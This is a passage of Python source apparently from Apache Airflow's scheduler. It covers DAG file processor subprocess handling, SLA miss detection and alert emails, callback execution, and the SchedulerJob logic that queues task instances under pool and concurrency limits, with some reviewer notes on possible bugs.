        # One-way pipe: the child writes the result, the parent only reads.
        _parent_channel, _child_channel = context.Pipe(duplex=False)
        process = context.Process(
            target=type(self)._run_file_processor,
            args=(
                _child_channel,
                _parent_channel,
                self.file_path,
                self._pickle_dags,
                self._dag_ids,
                f"DagFileProcessor{self._instance_id}",
                self._callback_requests,
            ),
            name=f"DagFileProcessor{self._instance_id}-Process",
        )
        self._process = process
        self._start_time = timezone.utcnow()
        process.start()

        # Close the child side of the pipe now the subprocess has started -- otherwise this would prevent it
        # from closing in some cases
        _child_channel.close()
        del _child_channel

        # Don't store it on self until after we've started the child process - we don't want to keep it from
        # getting GCd/closed
        self._parent_channel = _parent_channel

    def kill(self) -> None:
        """Kill the process launched to process the file, and ensure consistent state."""
        if self._process is None:
            raise AirflowException("Tried to kill before starting!")
        self._kill_process()

    def terminate(self, sigkill: bool = False) -> None:
        """
        Terminate (and then kill) the process launched to process the file.

        :param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
        :type sigkill: bool
        """
        if self._process is None or self._parent_channel is None:
            raise AirflowException("Tried to call terminate before starting!")
        self._process.terminate()
        # Arbitrarily wait 5s for the process to die
        with suppress(TimeoutError):
            self._process._popen.wait(5)  # type: ignore  # pylint: disable=protected-access
        if sigkill:
            self._kill_process()
        self._parent_channel.close()

    def _kill_process(self) -> None:
        """Send SIGKILL to the child (if still alive) and close our pipe end."""
        if self._process is None:
            raise AirflowException("Tried to kill process before starting!")
        if self._process.is_alive() and self._process.pid:
            self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
            # SIGKILL cannot be trapped by the child, so this always terminates it.
            os.kill(self._process.pid, signal.SIGKILL)
        if self._parent_channel:
            self._parent_channel.close()

    @property
    def pid(self) -> int:
        """
        :return: the PID of the process launched to process the given file
        :rtype: int
        """
        if self._process is None or self._process.pid is None:
            raise AirflowException("Tried to get PID before starting!")
        return self._process.pid

    @property
    def exit_code(self) -> Optional[int]:
        """
        After the process is finished, this can be called to get the return code

        :return: the exit code of the process
        :rtype: int
        """
        if self._process is None:
            raise AirflowException("Tried to get exit code before starting!")
        if not self._done:
            raise AirflowException("Tried to call retcode before process was finished!")
        return self._process.exitcode

    @property
    def done(self) -> bool:
        """
        Check if the process launched to process this file is done.

        :return: whether the process is finished running
        :rtype: bool
        """
        if self._process is None or self._parent_channel is None:
            raise AirflowException("Tried to see if it's done before starting!")

        if self._done:
            return True

        # poll() is non-blocking: either the child sent a result, or it closed
        # its end of the pipe (EOF) without sending one.
        if self._parent_channel.poll():
            try:
                self._result = self._parent_channel.recv()
                self._done = True
                self.log.debug("Waiting for %s", self._process)
                self._process.join()
                self._parent_channel.close()
                return True
            except EOFError:
                # If we get an EOFError, it means the child end of the pipe has been closed. This only happens
                # in the finally block. But due to a possible race condition, the process may have not yet
                # terminated (it could be doing cleanup/python shutdown still). So we kill it here after a
                # "suitable" timeout.
                self._done = True
                # Arbitrary timeout -- error/race condition only, so this doesn't need to be tunable.
                self._process.join(timeout=5)
                if self._process.is_alive():
                    # Didn't shut down cleanly - kill it
                    self._kill_process()

        if not self._process.is_alive():
            self._done = True
            self.log.debug("Waiting for %s", self._process)
            self._process.join()
            self._parent_channel.close()
            return True

        return False

    @property
    def result(self) -> Optional[Tuple[int, int]]:
        """
        :return: result of running DagFileProcessor.process_file()
        :rtype: tuple[int, int] or None
        """
        if not self.done:
            raise AirflowException("Tried to get the result before it's done!")
        return self._result

    @property
    def start_time(self) -> datetime.datetime:
        """
        :return: when this started to process the file
        :rtype: datetime
        """
        if self._start_time is None:
            raise AirflowException("Tried to get start time before it started!")
        return self._start_time

    @property
    def waitable_handle(self):
        """Handle usable with ``multiprocessing.connection.wait`` for process exit.

        NOTE(review): unlike the sibling properties, this does not guard against
        ``self._process`` being ``None`` — calling it before ``start()`` raises
        ``AttributeError`` rather than ``AirflowException``. Confirm whether
        callers guarantee ``start()`` has run first.
        """
        return self._process.sentinel
class DagFileProcessor(LoggingMixin):
    """
    Process a Python file containing Airflow DAGs.

    This includes:

    1. Execute the file and look for DAG objects in the namespace.
    2. Pickle the DAG and save it to the DB (if necessary).
    3. For each DAG, see what tasks should run and create appropriate task
       instances in the DB.
    4. Record any errors importing the file into ORM
    5. Kill (in ORM) any task instances belonging to the DAGs that haven't
       issued a heartbeat in a while.

    Returns a list of SimpleDag objects that represent the DAGs found in
    the file

    :param dag_ids: If specified, only look at these DAG ID's
    :type dag_ids: List[str]
    :param log: Logger to save the processing process
    :type log: logging.Logger
    """

    # Read once at class-definition time from the core config; when True,
    # failure callbacks are executed in test mode.
    UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')

    def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
        super().__init__()
        self.dag_ids = dag_ids
        self._log = log

    @provide_session
    def manage_slas(self, dag: DAG, session: Session = None) -> None:
        """
        Finding all tasks that have SLAs defined, and sending alert emails
        where needed. New SLA misses are also recorded in the database.

        We are assuming that the scheduler runs often, so we only check for
        tasks that should have succeeded in the past hour.
        """
        if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
            self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
            return

        # Latest SUCCESS/SKIPPED execution_date per task of this DAG.
        qry = (
            session.query(TI.task_id, func.max(TI.execution_date).label('max_ti'))
            .with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
            .filter(TI.dag_id == dag.dag_id)
            .filter(or_(TI.state == State.SUCCESS, TI.state == State.SKIPPED))
            .filter(TI.task_id.in_(dag.task_ids))
            .group_by(TI.task_id)
            .subquery('sq')
        )

        max_tis: List[TI] = (
            session.query(TI)
            .filter(
                TI.dag_id == dag.dag_id,
                TI.task_id == qry.c.task_id,
                TI.execution_date == qry.c.max_ti,
            )
            .all()
        )

        ts = timezone.utcnow()
        for ti in max_tis:
            task = dag.get_task(ti.task_id)
            if not isinstance(task.sla, timedelta):
                continue

            # Walk every schedule after the last success; record an SlaMiss for
            # each one whose following schedule plus the SLA has already passed.
            # NOTE(review): dag.following_schedule() can return None for DAGs
            # without a time-based schedule, which would make the `<` comparison
            # raise TypeError here — presumably only scheduled DAGs reach this
            # point. TODO confirm.
            dttm = dag.following_schedule(ti.execution_date)
            while dttm < timezone.utcnow():
                following_schedule = dag.following_schedule(dttm)
                if following_schedule + task.sla < timezone.utcnow():
                    session.merge(
                        SlaMiss(task_id=ti.task_id, dag_id=ti.dag_id, execution_date=dttm, timestamp=ts)
                    )
                dttm = dag.following_schedule(dttm)
        session.commit()

        # pylint: disable=singleton-comparison
        slas: List[SlaMiss] = (
            session.query(SlaMiss)
            .filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id)  # noqa
            .all()
        )
        # pylint: enable=singleton-comparison

        if slas:  # pylint: disable=too-many-nested-blocks
            sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
            # TIs that are still not successful for the missed execution dates
            # "block" the SLA and are reported alongside it.
            fetched_tis: List[TI] = (
                session.query(TI)
                .filter(TI.state != State.SUCCESS, TI.execution_date.in_(sla_dates), TI.dag_id == dag.dag_id)
                .all()
            )
            blocking_tis: List[TI] = []
            for ti in fetched_tis:
                if ti.task_id in dag.task_ids:
                    ti.task = dag.get_task(ti.task_id)
                    blocking_tis.append(ti)
                else:
                    # Task no longer exists in the DAG; drop the stale TI.
                    session.delete(ti)
                    session.commit()

            task_list = "\n".join([sla.task_id + ' on ' + sla.execution_date.isoformat() for sla in slas])
            blocking_task_list = "\n".join(
                [ti.task_id + ' on ' + ti.execution_date.isoformat() for ti in blocking_tis]
            )
            # Track whether email or any alert notification sent
            # We consider email or the alert callback as notifications
            email_sent = False
            notification_sent = False
            if dag.sla_miss_callback:
                # Execute the alert callback
                self.log.info('Calling SLA miss callback')
                try:
                    dag.sla_miss_callback(dag, task_list, blocking_task_list, slas, blocking_tis)
                    notification_sent = True
                except Exception:  # pylint: disable=broad-except
                    self.log.exception("Could not call sla_miss_callback for DAG %s", dag.dag_id)
            email_content = f"""\
            Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n<code></pre>
            Blocking tasks:
            <pre><code>{blocking_task_list}<code></pre>
            """

            tasks_missed_sla = []
            for sla in slas:
                try:
                    task = dag.get_task(sla.task_id)
                except TaskNotFound:
                    # task already deleted from DAG, skip it
                    self.log.warning(
                        "Task %s doesn't exist in DAG anymore, skipping SLA miss notification.", sla.task_id
                    )
                    continue
                tasks_missed_sla.append(task)

            # Collect the union of all alert recipients from the affected tasks.
            emails: Set[str] = set()
            for task in tasks_missed_sla:
                if task.email:
                    if isinstance(task.email, str):
                        emails |= set(get_email_address_list(task.email))
                    elif isinstance(task.email, (list, tuple)):
                        emails |= set(task.email)
            if emails:
                try:
                    send_email(emails, f"[airflow] SLA miss on DAG={dag.dag_id}", email_content)
                    email_sent = True
                    notification_sent = True
                except Exception:  # pylint: disable=broad-except
                    Stats.incr('sla_email_notification_failure')
                    self.log.exception("Could not send SLA Miss email notification for DAG %s", dag.dag_id)
            # If we sent any notification, update the sla_miss table
            if notification_sent:
                for sla in slas:
                    sla.email_sent = email_sent
                    sla.notification_sent = True
                    session.merge(sla)
            session.commit()

    @staticmethod
    def update_import_errors(session: Session, dagbag: DagBag) -> None:
        """
        For the DAGs in the given DagBag, record any associated import errors and clears
        errors for files that no longer have them. These are usually displayed through the
        Airflow UI so that users know that there are issues parsing DAGs.

        :param session: session for ORM operations
        :type session: sqlalchemy.orm.session.Session
        :param dagbag: DagBag containing DAGs with import errors
        :type dagbag: airflow.DagBag
        """
        # Clear the errors of the processed files
        for dagbag_file in dagbag.file_last_changed:
            session.query(errors.ImportError).filter(errors.ImportError.filename == dagbag_file).delete()

        # Add the errors of the processed files
        for filename, stacktrace in dagbag.import_errors.items():
            session.add(
                errors.ImportError(filename=filename, timestamp=timezone.utcnow(), stacktrace=stacktrace)
            )
        session.commit()

    @provide_session
    def execute_callbacks(
        self, dagbag: DagBag, callback_requests: List[CallbackRequest], session: Session = None
    ) -> None:
        """
        Execute on failure callbacks. These objects can come from SchedulerJob or from
        DagFileProcessorManager.

        :param dagbag: Dag Bag of dags
        :param callback_requests: failure callbacks to execute
        :type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
        :param session: DB session.
        """
        for request in callback_requests:
            try:
                # Dispatch by concrete request type; failures here are logged
                # but do not abort the remaining callbacks.
                if isinstance(request, TaskCallbackRequest):
                    self._execute_task_callbacks(dagbag, request)
                elif isinstance(request, SlaCallbackRequest):
                    # NOTE(review): dags.get() may return None if the dag_id is
                    # not in this bag — manage_slas would then fail on
                    # dag.tasks; presumably callers only send known dag_ids.
                    # TODO confirm.
                    self.manage_slas(dagbag.dags.get(request.dag_id))
                elif isinstance(request, DagCallbackRequest):
                    self._execute_dag_callbacks(dagbag, request, session)
            except Exception:  # pylint: disable=broad-except
                self.log.exception(
                    "Error executing %s callback for file: %s",
                    request.__class__.__name__,
                    request.full_filepath,
                )
        session.commit()

    @provide_session
    def _execute_dag_callbacks(self, dagbag: DagBag, request: DagCallbackRequest, session: Session):
        # Run the DAG-level success/failure callback for the requested run.
        dag = dagbag.dags[request.dag_id]
        dag_run = dag.get_dagrun(execution_date=request.execution_date, session=session)
        dag.handle_callback(
            dagrun=dag_run, success=not request.is_failure_callback, reason=request.msg, session=session
        )

    def _execute_task_callbacks(self, dagbag: DagBag, request: TaskCallbackRequest):
        # Re-hydrate a TaskInstance from the SimpleTaskInstance carried in the
        # request, then run its failure handling (only if the DAG/task still exist).
        simple_ti = request.simple_task_instance
        if simple_ti.dag_id in dagbag.dags:
            dag = dagbag.dags[simple_ti.dag_id]
            if simple_ti.task_id in dag.task_ids:
                task = dag.get_task(simple_ti.task_id)
                ti = TI(task, simple_ti.execution_date)
                # Get properties needed for failure handling from SimpleTaskInstance.
                ti.start_date = simple_ti.start_date
                ti.end_date = simple_ti.end_date
                ti.try_number = simple_ti.try_number
                ti.state = simple_ti.state
                ti.test_mode = self.UNIT_TEST_MODE
                if request.is_failure_callback:
                    ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
                    self.log.info('Executed failure callback for %s in state %s', ti, ti.state)

    @provide_session
    def process_file(
        self,
        file_path: str,
        callback_requests: List[CallbackRequest],
        pickle_dags: bool = False,
        session: Session = None,
    ) -> Tuple[int, int]:
        """
        Process a Python file containing Airflow DAGs.

        This includes:

        1. Execute the file and look for DAG objects in the namespace.
        2. Pickle the DAG and save it to the DB (if necessary).
        3. For each DAG, see what tasks should run and create appropriate task
           instances in the DB.
        4. Record any errors importing the file into ORM

        :param file_path: the path to the Python file that should be executed
        :type file_path: str
        :param callback_requests: failure callback to execute
        :type callback_requests: List[airflow.utils.dag_processing.CallbackRequest]
        :param pickle_dags: whether serialize the DAGs found in the file and
            save them to the db
        :type pickle_dags: bool
        :param session: Sqlalchemy ORM Session
        :type session: Session
        :return: number of dags found, count of import errors
        :rtype: Tuple[int, int]
        """
        self.log.info("Processing file %s for tasks to queue", file_path)

        try:
            dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
        except Exception:  # pylint: disable=broad-except
            self.log.exception("Failed at reloading the DAG file %s", file_path)
            Stats.incr('dag_file_refresh_error', 1, 1)
            return 0, 0

        if len(dagbag.dags) > 0:
            self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
        else:
            self.log.warning("No viable dags retrieved from %s", file_path)
            self.update_import_errors(session, dagbag)
            return 0, len(dagbag.import_errors)

        self.execute_callbacks(dagbag, callback_requests)

        # Save individual DAGs in the ORM
        dagbag.sync_to_db()

        if pickle_dags:
            # Only pickle DAGs that are not currently paused.
            paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
            unpaused_dags: List[DAG] = [
                dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
            ]
            for dag in unpaused_dags:
                dag.pickle(session)

        # Record import errors into the ORM
        try:
            self.update_import_errors(session, dagbag)
        except Exception:  # pylint: disable=broad-except
            self.log.exception("Error logging import errors!")

        return len(dagbag.dags), len(dagbag.import_errors)
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to run the scheduling loop. If you
have a large number of DAG files this could complete before each file
has been parsed. -1 for unlimited times.
:type num_runs: int
:param num_times_parse_dags: The number of times to try to parse each DAG file.
-1 for unlimited times.
:type num_times_parse_dags: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {'polymorphic_identity': 'SchedulerJob'}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
num_times_parse_dags: int = -1,
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args,
**kwargs,
):
self.subdir = subdir
self.num_runs = num_runs
# In specific tests, we want to stop the parse loop after the _files_ have been parsed a certain
# number of times. This is only to support testing, and isn't something a user is likely to want to
# configure -- they'll want num_runs
self.num_times_parse_dags = num_times_parse_dags
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
self.dagbag = DagBag(read_dags_from_db=True)
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
    @provide_session
    def _change_state_for_tis_without_dagrun(
        self, old_states: List[str], new_state: str, session: Session = None
    ) -> None:
        """
        For all DAG IDs in the DagBag, look for task instances in the
        old_states and set them to new_state if the corresponding DagRun
        does not exist or exists but is not in the running state. This
        normally should not happen, but it can if the state of DagRuns are
        changed manually.

        :param old_states: examine TaskInstances in this state
        :type old_states: list[airflow.utils.state.State]
        :param new_state: set TaskInstances to this state
        :type new_state: airflow.utils.state.State
        """
        tis_changed = 0
        # TIs in one of old_states whose DagRun is missing (outer join -> NULL)
        # or exists but is not RUNNING.
        query = (
            session.query(models.TaskInstance)
            .outerjoin(models.TaskInstance.dag_run)
            .filter(models.TaskInstance.dag_id.in_(list(self.dagbag.dag_ids)))
            .filter(models.TaskInstance.state.in_(old_states))
            .filter(
                or_(
                    # pylint: disable=comparison-with-callable
                    models.DagRun.state != State.RUNNING,
                    # pylint: disable=no-member
                    models.DagRun.state.is_(None),
                )
            )
        )
        # We need to do this for mysql as well because it can cause deadlocks
        # as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
        if self.using_sqlite or self.using_mysql:
            # Row-by-row update under row locks, skipping rows already locked
            # by another scheduler.
            tis_to_change: List[TI] = with_row_locks(query, of=TI, **skip_locked(session=session)).all()
            for ti in tis_to_change:
                ti.set_state(new_state, session=session)
                tis_changed += 1
        else:
            # Other backends: one bulk UPDATE joined against the subquery.
            subq = query.subquery()
            current_time = timezone.utcnow()
            ti_prop_update = {
                models.TaskInstance.state: new_state,
                models.TaskInstance.start_date: current_time,
            }

            # Only add end_date and duration if the new_state is 'success', 'failed' or 'skipped'
            if new_state in State.finished:
                ti_prop_update.update(
                    {
                        models.TaskInstance.end_date: current_time,
                        models.TaskInstance.duration: 0,
                    }
                )

            tis_changed = (
                session.query(models.TaskInstance)
                .filter(
                    models.TaskInstance.dag_id == subq.c.dag_id,
                    models.TaskInstance.task_id == subq.c.task_id,
                    models.TaskInstance.execution_date == subq.c.execution_date,
                )
                .update(ti_prop_update, synchronize_session=False)
            )

        if tis_changed > 0:
            session.flush()
            self.log.warning(
                "Set %s task instances to state=%s as their associated DagRun was not in RUNNING state",
                tis_changed,
                new_state,
            )
            Stats.gauge('scheduler.tasks.without_dagrun', tis_changed)
@provide_session
def __get_concurrency_maps(
self, states: List[str], session: Session = None
) -> Tuple[DefaultDict[str, int], DefaultDict[Tuple[str, str], int]]:
"""
Get the concurrency maps.
:param states: List of states to query for
:type states: list[airflow.utils.state.State]
:return: A map from (dag_id, task_id) to # of task instances and
a map from (dag_id, task_id) to # of task instances in the given state list
:rtype: tuple[dict[str, int], dict[tuple[str, str], int]]
"""
ti_concurrency_query: List[Tuple[str, str, int]] = (
session.query(TI.task_id, TI.dag_id, func.count('*'))
.filter(TI.state.in_(states))
.group_by(TI.task_id, TI.dag_id)
).all()
dag_map: DefaultDict[str, int] = defaultdict(int)
task_map: DefaultDict[Tuple[str, str], int] = defaultdict(int)
for result in ti_concurrency_query:
task_id, dag_id, count = result
dag_map[dag_id] += count
task_map[(dag_id, task_id)] = count
return dag_map, task_map
    # pylint: disable=too-many-locals,too-many-statements
    @provide_session
    def _executable_task_instances_to_queued(self, max_tis: int, session: Session = None) -> List[TI]:
        """
        Finds TIs that are ready for execution with respect to pool limits,
        dag concurrency, executor state, and priority.

        :param max_tis: Maximum number of TIs to queue in this loop.
        :type max_tis: int
        :return: list[airflow.models.TaskInstance]
        """
        executable_tis: List[TI] = []

        # Get the pool settings. We get a lock on the pool rows, treating this as a "critical section"
        # Throws an exception if lock cannot be obtained, rather than blocking
        pools = models.Pool.slots_stats(lock_rows=True, session=session)

        # If the pools are full, there is no point doing anything!
        # If _somehow_ the pool is overfull, don't let the limit go negative - it breaks SQL
        pool_slots_free = max(0, sum(pool['open'] for pool in pools.values()))

        if pool_slots_free == 0:
            self.log.debug("All pools are full!")
            return executable_tis

        max_tis = min(max_tis, pool_slots_free)

        # Get all task instances associated with scheduled
        # DagRuns which are not backfilled, in the given states,
        # and the dag is not paused
        query = (
            session.query(TI)
            .outerjoin(TI.dag_run)
            .filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
            .join(TI.dag_model)
            .filter(not_(DM.is_paused))
            .filter(TI.state == State.SCHEDULED)
            .options(selectinload('dag_model'))
            .limit(max_tis)
        )

        # Row locks (skipping already-locked rows) keep multiple schedulers
        # from queuing the same TI.
        task_instances_to_examine: List[TI] = with_row_locks(
            query,
            of=TI,
            **skip_locked(session=session),
        ).all()
        # TODO[HA]: This was wrong before anyway, as it only looked at a sub-set of dags, not everything.
        # Stats.gauge('scheduler.tasks.pending', len(task_instances_to_examine))

        if len(task_instances_to_examine) == 0:
            self.log.debug("No tasks to consider for execution.")
            return executable_tis

        # Put one task instance on each line
        task_instance_str = "\n\t".join([repr(x) for x in task_instances_to_examine])
        self.log.info("%s tasks up for execution:\n\t%s", len(task_instances_to_examine), task_instance_str)

        # Group candidates by the pool they want to run in.
        # (Annotation corrected: the lists hold TaskInstances, not Pools.)
        pool_to_task_instances: DefaultDict[str, List[TI]] = defaultdict(list)
        for task_instance in task_instances_to_examine:
            pool_to_task_instances[task_instance.pool].append(task_instance)

        # dag_id to # of running tasks and (dag_id, task_id) to # of running tasks.
        dag_concurrency_map: DefaultDict[str, int]
        task_concurrency_map: DefaultDict[Tuple[str, str], int]
        dag_concurrency_map, task_concurrency_map = self.__get_concurrency_maps(
            states=list(EXECUTION_STATES), session=session
        )

        # NOTE(review): num_tasks_in_executor is never incremented in this
        # method, so the 'scheduler.tasks.running' gauge below always reports 0.
        num_tasks_in_executor = 0
        # Number of tasks that cannot be scheduled because of no open slot in pool
        num_starving_tasks_total = 0

        # Go through each pool, and queue up a task for execution if there are
        # any open slots in the pool.
        # pylint: disable=too-many-nested-blocks
        for pool, task_instances in pool_to_task_instances.items():
            pool_name = pool
            if pool not in pools:
                self.log.warning("Tasks using non-existent pool '%s' will not be scheduled", pool)
                continue

            open_slots = pools[pool]["open"]

            num_ready = len(task_instances)
            self.log.info(
                "Figuring out tasks to run in Pool(name=%s) with %s open slots "
                "and %s task instances ready to be queued",
                pool,
                open_slots,
                num_ready,
            )

            # Highest priority first; ties broken by earliest execution date.
            priority_sorted_task_instances = sorted(
                task_instances, key=lambda ti: (-ti.priority_weight, ti.execution_date)
            )

            num_starving_tasks = 0
            for current_index, task_instance in enumerate(priority_sorted_task_instances):
                if open_slots <= 0:
                    self.log.info("Not scheduling since there are %s open slots in pool %s", open_slots, pool)
                    # Can't schedule any more since there are no more open slots.
                    num_unhandled = len(priority_sorted_task_instances) - current_index
                    num_starving_tasks += num_unhandled
                    num_starving_tasks_total += num_unhandled
                    break

                # Check to make sure that the task concurrency of the DAG hasn't been
                # reached.
                dag_id = task_instance.dag_id

                current_dag_concurrency = dag_concurrency_map[dag_id]
                dag_concurrency_limit = task_instance.dag_model.concurrency
                self.log.info(
                    "DAG %s has %s/%s running and queued tasks",
                    dag_id,
                    current_dag_concurrency,
                    dag_concurrency_limit,
                )
                if current_dag_concurrency >= dag_concurrency_limit:
                    self.log.info(
                        "Not executing %s since the number of tasks running or queued "
                        "from DAG %s is >= to the DAG's task concurrency limit of %s",
                        task_instance,
                        dag_id,
                        dag_concurrency_limit,
                    )
                    continue

                task_concurrency_limit: Optional[int] = None
                if task_instance.dag_model.has_task_concurrency_limits:
                    # Many dags don't have a task_concurrency, so where we can avoid loading the full
                    # serialized DAG the better.
                    serialized_dag = self.dagbag.get_dag(dag_id, session=session)
                    if serialized_dag.has_task(task_instance.task_id):
                        task_concurrency_limit = serialized_dag.get_task(
                            task_instance.task_id
                        ).task_concurrency

                    if task_concurrency_limit is not None:
                        current_task_concurrency = task_concurrency_map[
                            (task_instance.dag_id, task_instance.task_id)
                        ]

                        if current_task_concurrency >= task_concurrency_limit:
                            self.log.info(
                                "Not executing %s since the task concurrency for"
                                " this task has been reached.",
                                task_instance,
                            )
                            continue

                if task_instance.pool_slots > open_slots:
                    self.log.info(
                        "Not executing %s since it requires %s slots "
                        "but there are %s open slots in the pool %s.",
                        task_instance,
                        task_instance.pool_slots,
                        open_slots,
                        pool,
                    )
                    num_starving_tasks += 1
                    num_starving_tasks_total += 1
                    # Though we can execute tasks with lower priority if there's enough room
                    continue

                executable_tis.append(task_instance)
                # Account for the slots/concurrency this TI will consume so the
                # remaining candidates are judged against updated counts.
                open_slots -= task_instance.pool_slots
                dag_concurrency_map[dag_id] += 1
                task_concurrency_map[(task_instance.dag_id, task_instance.task_id)] += 1

            Stats.gauge(f'pool.starving_tasks.{pool_name}', num_starving_tasks)

        Stats.gauge('scheduler.tasks.starving', num_starving_tasks_total)
        Stats.gauge('scheduler.tasks.running', num_tasks_in_executor)
        Stats.gauge('scheduler.tasks.executable', len(executable_tis))

        task_instance_str = "\n\t".join([repr(x) for x in executable_tis])
        self.log.info("Setting the following tasks to queued state:\n\t%s", task_instance_str)

        # set TIs to queued state
        filter_for_tis = TI.filter_for_tis(executable_tis)
        session.query(TI).filter(filter_for_tis).update(
            # TODO[ha]: should we use func.now()? How does that work with DB timezone on mysql when it's not
            # UTC?
            {TI.state: State.QUEUED, TI.queued_dttm: timezone.utcnow(), TI.queued_by_job_id: self.id},
            synchronize_session=False,
        )

        for ti in executable_tis:
            make_transient(ti)
        return executable_tis
def _enqueue_task_instances_with_queued_state(self, task_instances: List[TI]) -> None:
"""
Takes task_instances, which should have been set to queued, and enqueues them
with the executor.
:param task_instances: TaskInstances to enqueue
:type task_instances: list[TaskInstance]
"""
# actually enqueue them
for ti in task_instances:
command = TI.generate_command(
ti.dag_id,
ti.task_id,
ti.execution_date,
local=True,
mark_success=False,
ignore_all_deps=False,
ignore_depends_on_past=False,
ignore_task_deps=False,
ignore_ti_state=False,
pool=ti.pool,
file_path=ti.dag_model.fileloc,
pickle_id=ti.dag_model.pickle_id,
)
priority = ti.priority_weight
queue = ti.queue
self.log.info("Sending %s to executor with priority %s and queue %s", ti.key, priority, queue)
self.executor.queue_command(
ti,
command,
priority=priority,
queue=queue,
)
def _critical_section_execute_task_instances(self, session: Session) -> int:
    """
    Attempts to execute TaskInstances that should be executed by the scheduler.

    There are three steps:
    1. Pick TIs by priority with the constraint that they are in the expected states
       and that we do exceed max_active_runs or pool limits.
    2. Change the state for the TIs above atomically.
    3. Enqueue the TIs in the executor.

    HA note: This function is a "critical section" meaning that only a single executor process can execute
    this function at the same time. This is achieved by doing ``SELECT ... from pool FOR UPDATE``. For DBs
    that support NOWAIT, a "blocked" scheduler will skip this and continue on with other tasks (creating
    new DAG runs, progressing TIs from None to SCHEDULED etc.); DBs that don't support this (such as
    MariaDB or MySQL 5.x) the other schedulers will wait for the lock before continuing.

    :param session:
    :type session: sqlalchemy.orm.Session
    :return: Number of task instance with state changed.
    """
    # Never request more TIs than the executor currently has free slots for.
    batch_limit = min(self.max_tis_per_query, self.executor.slots_available)

    tis_marked_queued = self._executable_task_instances_to_queued(batch_limit, session=session)
    self._enqueue_task_instances_with_queued_state(tis_marked_queued)
    return len(tis_marked_queued)
@provide_session
def _change_state_for_tasks_failed_to_execute(self, session: Session = None):
    """
    If there are tasks left over in the executor,
    we set them back to SCHEDULED to avoid creating hanging tasks.

    :param session: session for ORM operations
    """
    if not self.executor.queued_tasks:
        return

    # Match each leftover executor key against its exact DB row (QUEUED only).
    filter_for_ti_state_change = [
        and_(
            TI.dag_id == dag_id,
            TI.task_id == task_id,
            TI.execution_date == execution_date,
            # The TI.try_number will return raw try_number+1 since the
            # ti is not running. And we need to -1 to match the DB record.
            TI._try_number == try_number - 1,  # pylint: disable=protected-access
            TI.state == State.QUEUED,
        )
        for dag_id, task_id, execution_date, try_number in self.executor.queued_tasks.keys()
    ]
    ti_query = session.query(TI).filter(or_(*filter_for_ti_state_change))
    # Row locks prevent a concurrent scheduler from touching the same TIs.
    tis_to_set_to_scheduled: List[TI] = with_row_locks(ti_query).all()
    if not tis_to_set_to_scheduled:
        return

    # set TIs back to SCHEDULED state in bulk
    filter_for_tis = TI.filter_for_tis(tis_to_set_to_scheduled)
    session.query(TI).filter(filter_for_tis).update(
